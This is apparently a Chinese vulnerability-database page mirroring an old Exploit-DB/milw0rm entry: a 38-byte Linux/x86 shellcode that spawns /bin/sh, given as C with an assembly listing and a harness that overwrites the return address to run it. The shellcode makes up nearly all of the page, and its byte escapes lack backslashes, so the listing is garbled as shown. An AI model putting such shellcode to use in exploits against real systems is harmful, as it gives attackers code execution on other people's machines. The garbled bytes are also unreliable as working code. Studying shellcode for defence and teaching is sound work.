Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)

Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)

漏洞ID 1054611 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – execve(/bin/sh) Shellcode (38 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13445
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * [email protected]
 * execve /bin/sh
 *
 * main() {
 *  char *name[2];
 *  name[0]="/bin/sh";
 *  name[1]=NULL;
 *  execve(name[0],name,NULL);
 * }
*/

#include <stdio.h>

char shellcode[]=
"xebx18"		//	jmp	0x18		// 3-4
"x5e"			//	popl	%esi		// 5
"x89x76x08"		//	movl	%esi, 0x8(%esi)	// 6-8
"x31xc0"		//	xorl	%eax, %eax	// 9-10
"x88x46x07"		//	movb	%al, 0x7(%esi)  // 11-13
"x89x46x0c"		//	movl	%eax, 0xc(%esi)	// 14-16  
"x89xf3"		//	movl	%esi, %ebx	// 17-18
"x8dx4ex08"		//	leal	0x8(%esi), %ecx	// 19-21
"x8dx56x0c"		//	leal	0xc(%esi), %edx	// 22-24
"xb0x0b"		//	movb	$0xb, %al	// 25-20 0xb to eax (syscall execve)6
"xcdx80"		//	int	$0x80		// 27-28
"xe8xe3xffxffxff"	//	call	-0x1d
"/bin/sh";

main() {
	int *ret;
	ret=(int *)&ret +2;
	printf("Shellcode lenght=%dn",strlen(shellcode));
	(*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: Typo3 Showpic.PHP File Enumeration Vulnerability

Typo3 Showpic.PHP File Enumeration Vulnerability 漏洞ID 1100763 漏洞类型 Design Error 发布时间 2003-02-28 更新时间 2003-02-28 CVE编号 N/A CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享